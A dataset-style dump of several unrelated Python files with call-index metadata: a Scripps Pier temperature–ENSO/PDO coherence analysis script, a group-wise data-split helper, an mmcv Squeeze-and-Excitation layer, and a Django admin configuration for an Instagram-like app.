74, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((79, 18, 79, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((84, 18, 84, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((89, 18, 89, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((94, 18, 94, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((99, 18, 99, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((104, 18, 104, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((109, 18, 109, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((114, 18, 114, 238), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n')]
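For readers skimming the migration above: a minimal, hypothetical sketch of the field shape it converges on. The real project_formfac models are not part of this dump, so the model name below is an assumption; only the ForeignKey arguments are copied from the migration itself.

# Hypothetical sketch (model name assumed; field arguments taken from the
# migration above): every listed model ends up with this nullable, cascading
# "user" foreign key.
from django.conf import settings
from django.db import models

class FormFactor4DFile(models.Model):
    user = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        blank=True,
        null=True,
        on_delete=models.CASCADE,
        help_text='User who updated this object. Set on save by connection '
                  'to database. Anonymous if not found.')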
mmstoll/Ocean569_Code
SIO_Code/SIO_coherence.py
228cb719f3e82f187f704f343d3b3590a38236d7
""" Data: Temperature and Salinity time series from SIO Scripps Pier Salinity: measured in PSU at the surface (~0.5m) and at depth (~5m) Temp: measured in degrees C at the surface (~0.5m) and at depth (~5m) - Timestamp included beginning in 1990 """ # imports import sys,os import pandas as pd import numpy as np import matplotlib.pyplot as plt import datetime from scipy import signal import scipy.stats as ss import SIO_modules as SIO_mod from importlib import reload reload(SIO_mod) # read in temp and sal files sal_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_SALT_1916-201905.txt', sep='\t', skiprows = 27) temp_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_TEMP_1916_201905.txt', sep='\t', skiprows = 26) ENSO_data = pd.read_excel('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_data.xlsx') ENSO_data_recent = pd.read_excel('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_recent_data.xlsx') PDO_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_PDO_data.csv', skiprows = 1) path_out = '/Users/MMStoll/Python/Output/Ocean569_Output/SIO_Output/' # convert year, month, day columns to single DATE column sal_data['DATE'] = pd.to_datetime(sal_data[['YEAR', 'MONTH', 'DAY']]) temp_data['DATE'] = pd.to_datetime(temp_data[['YEAR', 'MONTH', 'DAY']]) ENSO_data_all = ENSO_data.append(ENSO_data_recent[323:], ignore_index = True) PDO_data['DATE'] = pd.to_datetime(PDO_data['Date'], format='%Y%m') # remove uncertain data(SURF_FLAG between 1 and 4), replace with NaN, then interpolate for i in range(0,len(sal_data['SURF_SAL_PSU'])): if (sal_data['SURF_FLAG'][i] >= 1) and (sal_data['SURF_FLAG'][i] <=4): sal_data['SURF_SAL_PSU'][i] = np.nan for i in range(0,len(temp_data['SURF_TEMP_C'])): if (sal_data['SURF_FLAG'][i] >= 1) and (sal_data['SURF_FLAG'][i] <=4): sal_data['SURF_SAL_PSU'][i] = np.nan # interpolate missing temp and sal data sal_data['SURF_SAL_PSU'] = sal_data['SURF_SAL_PSU'].interpolate() temp_data['SURF_TEMP_C'] = temp_data['SURF_TEMP_C'].interpolate() sal_data['SURF_SAL_PSU'][0] = sal_data['SURF_SAL_PSU'][1] # remove the average from the sal and temp data and create new columns sal_data['SURF_SAL_PSU_NOAVG'] = sal_data['SURF_SAL_PSU'] - sal_data['SURF_SAL_PSU'].mean() temp_data['SURF_TEMP_C_NOAVG'] = temp_data['SURF_TEMP_C'] - temp_data['SURF_TEMP_C'].mean() # remove trends from the sal and temp data and create new columns sal_fit = np.polyfit(sal_data.index,sal_data['SURF_SAL_PSU_NOAVG'],1) sal_fit_fn = np.poly1d(sal_fit) temp_fit = np.polyfit(temp_data.index,temp_data['SURF_TEMP_C_NOAVG'],1) temp_fit_fn = np.poly1d(temp_fit) sal_fit_value = sal_fit_fn(sal_data.index) temp_fit_value = temp_fit_fn(temp_data.index) sal_data['SURF_SAL_PSU_DETREND'] = sal_data['SURF_SAL_PSU_NOAVG'] - sal_fit_value temp_data['SURF_TEMP_C_DETREND'] = temp_data['SURF_TEMP_C_NOAVG'] - temp_fit_value sal_tri = sal_data['SURF_SAL_PSU_DETREND'].rolling(center = True, window = 30, min_periods = 3, win_type = 'triang').mean() temp_tri = temp_data['SURF_TEMP_C_DETREND'].rolling(center = True, window = 30, min_periods = 3, win_type = 'triang').mean() # # 1. FFT the SIO Data # t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_data['SURF_TEMP_C_DETREND']) # # 2. 
Apply butterworth filter to SIO data, with cutoff equal to nyquist freq of enso index # fs = 1 # sampling frequency, once per day # fc = 1/60 # cut-off frequency of the filter (cut off periods shorter than 60 days) # w = fc / (fs / 2) #normalize the frequency # b, a = signal.butter(4, w, 'low') # temp_output = signal.filtfilt(b, a, t_spec) # # 3. Inverse FFT of filtered SIO data # temp_ifft = np.fft.irfft(temp_output,n=len(temp_output)) # # 4. Subsample new SIO time series with same delta t as ENSO index (once per month) # temp_ifft_sampled = np.mean(temp_ifft[0:18750].reshape(-1, 30), axis=1) # temp_ifft_len = temp_ifft_sampled[0:618] # x = np.linspace(0,18770, 18770) # plt.figure() # plt.loglog(x, temp_ifft) # plt.show() # butterworth low pass filter for temperature and salinity fs = 1 # sampling frequency, once per day fc = 1/500 # cut-off frequency of the filter (cut off periods shorter than 500 days) w = fc / (fs / 2) #normalize the frequency b, a = signal.butter(4, w, 'low') temp_output = signal.filtfilt(b, a, temp_tri) sal_output = signal.filtfilt(b, a, sal_tri) temp_sampled = np.mean(temp_output[0:37530].reshape(-1, 30), axis=1) #length = 1251 # create dataframe with spectra for each variable spectra_temp_df = pd.DataFrame(columns = ['Temp_freq', 'Temp_spec', 'Temp_fft']) spectra_sal_df = pd.DataFrame(columns = ['Sal_freq', 'Sal_spec', 'Sal_fft']) spectra_PDO_df = pd.DataFrame(columns = ['PDO_freq', 'PDO_spec', 'PDO_fft']) spectra_ENSO_df = pd.DataFrame(columns = ['ENSO_freq', 'ENSO_spec', 'ENSO_fft']) # for coherence, start all records at 1916-01-01 # ENSO data [20:] 1916-09-01 onward, monthly// ends now, through 2019-05-01 [:1254] # Temp data [10:] 1916-09-01 onward, daily // ends 2019-05-31 # PDO data [752:] 1916-09-01 onward, monthly// ends now, thorugh 2019-05-01 [:1985] # compute spectral variables for each variable for j in range(0,4): data_sets = [temp_sampled, sal_data['SURF_SAL_PSU_DETREND'], PDO_data['Value'][743:], ENSO_data_all['VALUE'][14:]] freq, spec, spec_amp, fft, delt, freq_T, freq_nyquist = SIO_mod.var_fft(data_sets[j]) if j == 0: spectra_temp_df['Temp_freq'] = freq spectra_temp_df['Temp_spec'] = spec spectra_temp_df['Temp_fft'] = fft if j == 1: spectra_sal_df['Sal_freq'] = freq spectra_sal_df['Sal_spec'] = spec spectra_sal_df['Sal_fft'] = fft if j == 2: spectra_PDO_df['PDO_freq'] = freq spectra_PDO_df['PDO_spec'] = spec spectra_PDO_df['PDO_fft'] = fft if j == 3: spectra_ENSO_df['ENSO_freq'] = freq spectra_ENSO_df['ENSO_spec'] = spec spectra_ENSO_df['ENSO_fft'] = fft def band_average(fft_var1,fft_var2,frequency,n_av): # fft_var1 and fft_var2 are the inputs computed via fft # they can be the same variable or different variables # n_av is the number of bands to be used for smoothing (nice if it is an odd number) # this function is limnited to 100,000 points but can easily be modified nmax=100000 # T_length = (len(fft_var1) * 2 - 2) # define some variables and arrays n_spec=len(fft_var1) n_av2=int(n_av//2+1) #number of band averages/2 + 1 spec_amp_av=np.zeros(nmax) spec_phase_av=np.zeros(nmax) freq_av=np.zeros(nmax) # average the lowest frequency bands first (with half as many points in the average) sum_low_amp=0. sum_low_phase=0. count=0 spectrum_amp=np.absolute(fft_var1*np.conj(fft_var2))#/(2.*np.pi*T_length*delt) spectrum_phase=np.angle(fft_var1*np.conj(fft_var2),deg=True) #/(2.*np.pi*T_length*delt) don't know if I need the 2pi/Tdeltt here... 
# for i in range(0,n_av2): sum_low_amp+=spectrum_amp[i] sum_low_phase+=spectrum_phase[i] spec_amp_av[0]=sum_low_amp/n_av2 spec_phase_av[0]=sum_low_phase/n_av # compute the rest of the averages for i in range(n_av2,n_spec-n_av,n_av): count+=1 spec_amp_est=np.mean(spectrum_amp[i:i+n_av]) spec_phase_est=np.mean(spectrum_phase[i:i+n_av]) freq_est=frequency[i+n_av//2] spec_amp_av[count]=spec_amp_est spec_phase_av[count]=spec_phase_est freq_av[count]=freq_est # omega0 = 2.*np.pi/(T_length*delt) # contract the arrays spec_amp_av=spec_amp_av[0:count] spec_phase_av=spec_phase_av[0:count] freq_av=freq_av[0:count] return spec_amp_av,spec_phase_av,freq_av,count n_av = 5 # define terms to compute coherence between temp and ENSO t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_sampled) #take fft/compute spectra of temp_sampled at 30 day intervals t_spec_b,t_phase_b,t_freq_av_b,count=band_average(t_fft,t_fft,t_freq,n_av) e_spec_b,e_phase_b,e_freq_av_b,count=band_average(spectra_ENSO_df['ENSO_fft'],spectra_ENSO_df['ENSO_fft'],spectra_ENSO_df['ENSO_freq'],n_av) e_fft_star = np.conj(spectra_ENSO_df['ENSO_fft']) cospec_amp2,cospec_phase2,freq_av2,count2=band_average(t_fft,e_fft_star,spectra_ENSO_df['ENSO_freq'],n_av) coh_sq2=cospec_amp2**2/(t_spec_b*e_spec_b) # define colors t_color = 'cadetblue' s_color = 'darkslateblue' p_color = 'seagreen' e_color = 'steelblue' freq_ann = 2*np.pi/365.25 # plot the coherence and phase between ENSO and temperature tstr = 'SIO Temperature and ENSO Index \nCoherence and Phase' im_name = 'SIO_TempENSO_CoherencePhase.jpg' NR = 2; NC = 1 fig, axes = plt.subplots(nrows = NR,ncols=NC,figsize = (10,7)) axes[0].semilogx(freq_av2,coh_sq2, color = e_color) axes[0].set_xlabel('$\omega$ (radians/day)') axes[0].set_ylabel('Squared Coherence $\it{T}$-$\it{ENSO}$') axes[0].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5) axes[0].text(0.075, 0.1,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes) axes[0].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5) axes[0].text(0.00018, 0.1,'$\omega_o$', alpha = 0.5) #transform = ax.transAxes) axes[0].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5) axes[0].text(0.0098, 0.1, 'Annual', alpha = 0.5)#transform = ax.transAxes) axes[1].semilogx(freq_av2, cospec_phase2, color = e_color) axes[1].set_xlabel('$\omega$ (radians/day)') axes[1].set_ylabel('Phase $\it{T}$-$\it{ENSO}$, degrees') axes[1].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5) axes[1].text(0.075, -110,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes) axes[1].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5) axes[1].text(0.00018, -110,'$\omega_o$', alpha = 0.5)#transform = ax.transAxes) axes[1].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5) axes[1].text(0.0098, -110, 'Annual', alpha = 0.5)#transform = ax.transAxes) fig.suptitle(tstr) # fig.tight_layout(pad=2.0) plt.savefig(path_out + im_name) plt.show() n_av = 5 # define terms to compute coherence between temp and ENSO #t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_sampled) #take fft/compute spectra of temp_sampled at 30 day intervals #t_spec_b,t_phase_b,t_freq_av_b,count=band_average(t_fft,t_fft,t_freq,n_av) p_spec_b,p_phase_b,p_freq_av_b,count=band_average(spectra_PDO_df['PDO_fft'],spectra_PDO_df['PDO_fft'],spectra_PDO_df['PDO_freq'],n_av) p_fft_star = np.conj(spectra_PDO_df['PDO_fft']) 
cospec_amp2,cospec_phase2,freq_av2,count2=band_average(t_fft,p_fft_star,spectra_PDO_df['PDO_freq'],n_av) coh_sq2=cospec_amp2**2/(t_spec_b*p_spec_b) # plot the coherence and phase between ENSO and temperature tstr = 'SIO Temperature and PDO Index \nCoherence and Phase' im_name = 'SIO_TempPDO_CoherencePhase.jpg' NR = 2; NC = 1 fig, axes = plt.subplots(nrows = NR,ncols=NC,figsize = (10,7)) axes[0].semilogx(freq_av2,coh_sq2, color = p_color) axes[0].set_xlabel('$\omega$ (radians/day)') axes[0].set_ylabel('Squared Coherence $\it{T}$-$\it{PDO}$') axes[0].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5) axes[0].text(0.075, 0.1,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes) axes[0].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5) axes[0].text(0.00018, 0.1,'$\omega_o$', alpha = 0.5) #transform = ax.transAxes) axes[0].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5) axes[0].text(0.0098, 0.1, 'Annual', alpha = 0.5)#transform = ax.transAxes) axes[1].semilogx(freq_av2, cospec_phase2, color = p_color) axes[1].set_xlabel('$\omega$ (radians/day)') axes[1].set_ylabel('Phase $\it{T}$-$\it{PDO}$, degrees') axes[1].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5) axes[1].text(0.075, -110,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes) axes[1].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5) axes[1].text(0.00018, -110,'$\omega_o$', alpha = 0.5)#transform = ax.transAxes) axes[1].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5) axes[1].text(0.0098, -110, 'Annual', alpha = 0.5)#transform = ax.transAxes) fig.suptitle(tstr) # fig.tight_layout(pad=2.0) plt.savefig(path_out + im_name) plt.show()
[((20, 0, 20, 15), 'importlib.reload', 'reload', ({(20, 7, 20, 14): 'SIO_mod'}, {}), '(SIO_mod)', False, 'from importlib import reload\n'), ((23, 11, 23, 125), 'pandas.read_csv', 'pd.read_csv', (), '', True, 'import pandas as pd\n'), ((24, 12, 24, 126), 'pandas.read_csv', 'pd.read_csv', (), '', True, 'import pandas as pd\n'), ((25, 12, 25, 98), 'pandas.read_excel', 'pd.read_excel', ({(25, 26, 25, 97): '"""/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_data.xlsx"""'}, {}), "(\n '/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_data.xlsx')", True, 'import pandas as pd\n'), ((26, 19, 26, 112), 'pandas.read_excel', 'pd.read_excel', ({(26, 33, 26, 111): '"""/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_recent_data.xlsx"""'}, {}), "(\n '/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_recent_data.xlsx'\n )", True, 'import pandas as pd\n'), ((27, 11, 27, 107), 'pandas.read_csv', 'pd.read_csv', (), '', True, 'import pandas as pd\n'), ((31, 19, 31, 69), 'pandas.to_datetime', 'pd.to_datetime', ({(31, 34, 31, 68): "sal_data[['YEAR', 'MONTH', 'DAY']]"}, {}), "(sal_data[['YEAR', 'MONTH', 'DAY']])", True, 'import pandas as pd\n'), ((32, 20, 32, 71), 'pandas.to_datetime', 'pd.to_datetime', ({(32, 35, 32, 70): "temp_data[['YEAR', 'MONTH', 'DAY']]"}, {}), "(temp_data[['YEAR', 'MONTH', 'DAY']])", True, 'import pandas as pd\n'), ((34, 19, 34, 66), 'pandas.to_datetime', 'pd.to_datetime', (), '', True, 'import pandas as pd\n'), ((55, 10, 55, 69), 'numpy.polyfit', 'np.polyfit', ({(55, 21, 55, 35): 'sal_data.index', (55, 36, 55, 66): "sal_data['SURF_SAL_PSU_NOAVG']", (55, 67, 55, 68): '1'}, {}), "(sal_data.index, sal_data['SURF_SAL_PSU_NOAVG'], 1)", True, 'import numpy as np\n'), ((56, 13, 56, 31), 'numpy.poly1d', 'np.poly1d', ({(56, 23, 56, 30): 'sal_fit'}, {}), '(sal_fit)', True, 'import numpy as np\n'), ((57, 11, 57, 71), 'numpy.polyfit', 'np.polyfit', ({(57, 22, 57, 37): 'temp_data.index', (57, 38, 57, 68): "temp_data['SURF_TEMP_C_NOAVG']", (57, 69, 57, 70): '1'}, {}), "(temp_data.index, temp_data['SURF_TEMP_C_NOAVG'], 1)", True, 'import numpy as np\n'), ((58, 14, 58, 33), 'numpy.poly1d', 'np.poly1d', ({(58, 24, 58, 32): 'temp_fit'}, {}), '(temp_fit)', True, 'import numpy as np\n'), ((96, 7, 96, 33), 'scipy.signal.butter', 'signal.butter', ({(96, 21, 96, 22): '4', (96, 24, 96, 25): 'w', (96, 27, 96, 32): '"""low"""'}, {}), "(4, w, 'low')", False, 'from scipy import signal\n'), ((97, 14, 97, 45), 'scipy.signal.filtfilt', 'signal.filtfilt', ({(97, 30, 97, 31): 'b', (97, 33, 97, 34): 'a', (97, 36, 97, 44): 'temp_tri'}, {}), '(b, a, temp_tri)', False, 'from scipy import signal\n'), ((98, 13, 98, 43), 'scipy.signal.filtfilt', 'signal.filtfilt', ({(98, 29, 98, 30): 'b', (98, 32, 98, 33): 'a', (98, 35, 98, 42): 'sal_tri'}, {}), '(b, a, sal_tri)', False, 'from scipy import signal\n'), ((104, 18, 104, 80), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((105, 17, 105, 76), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((106, 17, 106, 76), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((107, 18, 107, 80), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((180, 64, 180, 93), 'SIO_modules.var_fft', 'SIO_mod.var_fft', ({(180, 80, 180, 92): 'temp_sampled'}, {}), '(temp_sampled)', True, 'import SIO_modules as SIO_mod\n'), ((183, 13, 183, 49), 'numpy.conj', 'np.conj', ({(183, 21, 183, 48): "spectra_ENSO_df['ENSO_fft']"}, {}), "(spectra_ENSO_df['ENSO_fft'])", 
True, 'import numpy as np\n'), ((199, 12, 199, 62), 'matplotlib.pyplot.subplots', 'plt.subplots', (), '', True, 'import matplotlib.pyplot as plt\n'), ((220, 0, 220, 31), 'matplotlib.pyplot.savefig', 'plt.savefig', ({(220, 12, 220, 30): '(path_out + im_name)'}, {}), '(path_out + im_name)', True, 'import matplotlib.pyplot as plt\n'), ((221, 0, 221, 10), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((228, 13, 228, 47), 'numpy.conj', 'np.conj', ({(228, 21, 228, 46): "spectra_PDO_df['PDO_fft']"}, {}), "(spectra_PDO_df['PDO_fft'])", True, 'import numpy as np\n'), ((237, 12, 237, 62), 'matplotlib.pyplot.subplots', 'plt.subplots', (), '', True, 'import matplotlib.pyplot as plt\n'), ((258, 0, 258, 31), 'matplotlib.pyplot.savefig', 'plt.savefig', ({(258, 12, 258, 30): '(path_out + im_name)'}, {}), '(path_out + im_name)', True, 'import matplotlib.pyplot as plt\n'), ((259, 0, 259, 10), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((117, 57, 117, 86), 'SIO_modules.var_fft', 'SIO_mod.var_fft', ({(117, 73, 117, 85): 'data_sets[j]'}, {}), '(data_sets[j])', True, 'import SIO_modules as SIO_mod\n'), ((147, 16, 147, 30), 'numpy.zeros', 'np.zeros', ({(147, 25, 147, 29): 'nmax'}, {}), '(nmax)', True, 'import numpy as np\n'), ((148, 18, 148, 32), 'numpy.zeros', 'np.zeros', ({(148, 27, 148, 31): 'nmax'}, {}), '(nmax)', True, 'import numpy as np\n'), ((149, 12, 149, 26), 'numpy.zeros', 'np.zeros', ({(149, 21, 149, 25): 'nmax'}, {}), '(nmax)', True, 'import numpy as np\n'), ((165, 21, 165, 52), 'numpy.mean', 'np.mean', ({(165, 29, 165, 51): 'spectrum_amp[i:i + n_av]'}, {}), '(spectrum_amp[i:i + n_av])', True, 'import numpy as np\n'), ((166, 23, 166, 56), 'numpy.mean', 'np.mean', ({(166, 31, 166, 55): 'spectrum_phase[i:i + n_av]'}, {}), '(spectrum_phase[i:i + n_av])', True, 'import numpy as np\n'), ((154, 38, 154, 55), 'numpy.conj', 'np.conj', ({(154, 46, 154, 54): 'fft_var2'}, {}), '(fft_var2)', True, 'import numpy as np\n'), ((155, 37, 155, 54), 'numpy.conj', 'np.conj', ({(155, 45, 155, 53): 'fft_var2'}, {}), '(fft_var2)', True, 'import numpy as np\n')]
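The script above estimates squared coherence as the band-averaged cross-spectrum magnitude squared divided by the product of the band-averaged auto-spectra. A self-contained sketch of that same estimate on synthetic data is below; the signal parameters are made up and none of the variable names come from the SIO script.

# Illustrative only: squared coherence of two noisy sinusoids, using the same
# band-averaged cross-spectrum formula as the SIO script above.
import numpy as np

n, n_av = 4096, 5
t = np.arange(n)
x = np.sin(2 * np.pi * t / 50) + 0.5 * np.random.randn(n)
y = np.sin(2 * np.pi * t / 50 + 0.3) + 0.5 * np.random.randn(n)

fx, fy = np.fft.rfft(x), np.fft.rfft(y)

def band_avg(spec, n_av=n_av):
    # average n_av adjacent frequency bands (drop the remainder)
    m = (len(spec) // n_av) * n_av
    return spec[:m].reshape(-1, n_av).mean(axis=1)

sxx = band_avg(np.abs(fx) ** 2)
syy = band_avg(np.abs(fy) ** 2)
sxy = band_avg(fx * np.conj(fy))
coh_sq = np.abs(sxy) ** 2 / (sxx * syy)  # near 1 at the shared 1/50 frequency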
rcdilorenzo/abfs
abfs/group_data_split.py
a897d00a4589a9412a9b9e737f8db91df008fc26
from collections import namedtuple as Struct
from sklearn.model_selection import GroupShuffleSplit, ShuffleSplit

DataSplitConfig = Struct('DataSplitConfig', ['validation_size', 'test_size', 'random_seed'])
DEFAULT_SPLIT_CONFIG = DataSplitConfig(0.2, 0.2, 1337)


class GroupDataSplit():
    def __init__(self, df, key, config=DEFAULT_SPLIT_CONFIG):
        self.config = config
        self.key = key
        self._df = df
        self._split_data()

    @property
    def total(self):
        """Total records in the data frame"""
        return len(self._df)

    def train_df(self):
        """Randomized train data frame"""
        return self._train_df.sample(frac=1).reset_index(drop=True)

    @property
    def val_df(self):
        """Validation data frame"""
        return self._val_df

    @property
    def test_df(self):
        """Test data frame"""
        return self._test_df

    @property
    def test_split(self):
        return GroupShuffleSplit(test_size=self.config.test_size,
                                 random_state=self.config.random_seed).split

    @property
    def val_split(self):
        val_size = self.config.validation_size / (1 - self.config.test_size)
        return GroupShuffleSplit(test_size=val_size,
                                 random_state=self.config.random_seed).split

    def _split_data(self):
        rem_indices, test_indices = next(
            self.test_split(self._df, groups=self._df[self.key])
        )

        rem_df = self._df.iloc[rem_indices]
        train_indices, val_indices = next(
            self.val_split(rem_df, groups=rem_df[self.key])
        )

        self._test_df = self._df.iloc[test_indices]
        self._val_df = rem_df.iloc[val_indices]
        self._train_df = rem_df.iloc[train_indices]
[((4, 18, 4, 92), 'collections.namedtuple', 'Struct', ({(4, 25, 4, 42): '"""DataSplitConfig"""', (4, 44, 4, 91): "['validation_size', 'test_size', 'random_seed']"}, {}), "('DataSplitConfig', ['validation_size', 'test_size', 'random_seed'])", True, 'from collections import namedtuple as Struct\n'), ((36, 15, 37, 70), 'sklearn.model_selection.GroupShuffleSplit', 'GroupShuffleSplit', (), '', False, 'from sklearn.model_selection import GroupShuffleSplit, ShuffleSplit\n'), ((42, 15, 43, 70), 'sklearn.model_selection.GroupShuffleSplit', 'GroupShuffleSplit', (), '', False, 'from sklearn.model_selection import GroupShuffleSplit, ShuffleSplit\n')]
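A usage sketch for GroupDataSplit; the column name and data below are invented for illustration. Rows that share a key value never straddle the train/validation/test boundary.

# Illustrative usage only (column name and values are made up).
import pandas as pd

df = pd.DataFrame({
    'region': ['a', 'a', 'b', 'b', 'c', 'c', 'd', 'd', 'e', 'e'],
    'value': range(10),
})
split = GroupDataSplit(df, key='region')      # default 60/20/20 group-wise split
print(split.total)                            # 10
print(len(split.train_df()))                  # train rows, reshuffled on each call
print(len(split.val_df), len(split.test_df))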
YuxinZou/mmclassification
mmcls/models/utils/se_layer.py
2037260ea6c98a3b115e97727e1151a1c2c32f7a
# Copyright (c) OpenMMLab. All rights reserved.
import mmcv
import torch.nn as nn
from mmcv.cnn import ConvModule
from mmcv.runner import BaseModule

from .make_divisible import make_divisible


class SELayer(BaseModule):
    """Squeeze-and-Excitation Module.

    Args:
        channels (int): The input (and output) channels of the SE layer.
        squeeze_channels (None or int): The intermediate channel number of
            SElayer. Default: None, means the value of ``squeeze_channels``
            is ``make_divisible(channels // ratio, divisor)``.
        ratio (int): Squeeze ratio in SELayer, the intermediate channel will
            be ``make_divisible(channels // ratio, divisor)``. Only used when
            ``squeeze_channels`` is None. Default: 16.
        divisor(int): The divisor to true divide the channel number. Only
            used when ``squeeze_channels`` is None. Default: 8.
        conv_cfg (None or dict): Config dict for convolution layer. Default:
            None, which means using conv2d.
        act_cfg (dict or Sequence[dict]): Config dict for activation layer.
            If act_cfg is a dict, two activation layers will be configurated
            by this dict. If act_cfg is a sequence of dicts, the first
            activation layer will be configurated by the first dict and the
            second activation layer will be configurated by the second dict.
            Default: (dict(type='ReLU'), dict(type='Sigmoid'))
    """

    def __init__(self,
                 channels,
                 squeeze_channels=None,
                 ratio=16,
                 divisor=8,
                 bias='auto',
                 conv_cfg=None,
                 act_cfg=(dict(type='ReLU'), dict(type='Sigmoid')),
                 init_cfg=None):
        super(SELayer, self).__init__(init_cfg)
        if isinstance(act_cfg, dict):
            act_cfg = (act_cfg, act_cfg)
        assert len(act_cfg) == 2
        assert mmcv.is_tuple_of(act_cfg, dict)
        self.global_avgpool = nn.AdaptiveAvgPool2d(1)
        if squeeze_channels is None:
            squeeze_channels = make_divisible(channels // ratio, divisor)
        assert isinstance(squeeze_channels, int) and squeeze_channels > 0, \
            '"squeeze_channels" should be a positive integer, but get ' + \
            f'{squeeze_channels} instead.'
        self.conv1 = ConvModule(
            in_channels=channels,
            out_channels=squeeze_channels,
            kernel_size=1,
            stride=1,
            bias=bias,
            conv_cfg=conv_cfg,
            act_cfg=act_cfg[0])
        self.conv2 = ConvModule(
            in_channels=squeeze_channels,
            out_channels=channels,
            kernel_size=1,
            stride=1,
            bias=bias,
            conv_cfg=conv_cfg,
            act_cfg=act_cfg[1])

    def forward(self, x):
        out = self.global_avgpool(x)
        out = self.conv1(out)
        out = self.conv2(out)
        return x * out
[((46, 15, 46, 46), 'mmcv.is_tuple_of', 'mmcv.is_tuple_of', ({(46, 32, 46, 39): 'act_cfg', (46, 41, 46, 45): 'dict'}, {}), '(act_cfg, dict)', False, 'import mmcv\n'), ((47, 30, 47, 53), 'torch.nn.AdaptiveAvgPool2d', 'nn.AdaptiveAvgPool2d', ({(47, 51, 47, 52): '1'}, {}), '(1)', True, 'import torch.nn as nn\n'), ((53, 21, 60, 31), 'mmcv.cnn.ConvModule', 'ConvModule', (), '', False, 'from mmcv.cnn import ConvModule\n'), ((61, 21, 68, 31), 'mmcv.cnn.ConvModule', 'ConvModule', (), '', False, 'from mmcv.cnn import ConvModule\n')]
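A forward-pass sketch for SELayer; it assumes torch and mmcv are installed, and the batch and spatial sizes are arbitrary. The output keeps the input shape because the layer only rescales channels.

# Illustrative usage only: channel-wise reweighting preserves the tensor shape.
import torch

se = SELayer(channels=64, ratio=16)   # squeeze width is make_divisible(64 // 16, 8)
x = torch.randn(2, 64, 32, 32)
out = se(x)
print(out.shape)                      # torch.Size([2, 64, 32, 32])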
James19stack/instagram-copy_cat
instagram/admin.py
996a8678cec84a05e97d803356194cd112ee53e6
from django.contrib import admin
from .models import Images,Comments,Profile

# Register your models here.
class CommentInline(admin.TabularInline):
    model=Comments
    extra=3

class ImageInline(admin.ModelAdmin):
    fieldsets=[
        (None,{'fields':['image']}),
        (None,{'fields':['image_name']}),
        (None,{'fields':['image_caption']}),
        (None,{'fields':['likes']}),
    ]
    inlines=[CommentInline]

admin.site.site_header='InstaPost Admin'
admin.site.site_title='InstaPost Admin Dashboard'
admin.site.register(Images,ImageInline)
admin.site.register(Profile)
[((22, 0, 22, 39), 'django.contrib.admin.site.register', 'admin.site.register', ({(22, 20, 22, 26): 'Images', (22, 27, 22, 38): 'ImageInline'}, {}), '(Images, ImageInline)', False, 'from django.contrib import admin\n'), ((23, 0, 23, 28), 'django.contrib.admin.site.register', 'admin.site.register', ({(23, 20, 23, 27): 'Profile'}, {}), '(Profile)', False, 'from django.contrib import admin\n')]
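The admin above only works if Comments carries a foreign key to Images and Images exposes the four listed fields. The real instagram/models.py is not part of this dump, so the sketch below is a guess at those models; the field types are assumptions, only the field names come from the fieldsets.

# Hypothetical models sketch (field types assumed; field names taken from the
# fieldsets above). TabularInline needs Comments -> Images to be a ForeignKey.
from django.db import models

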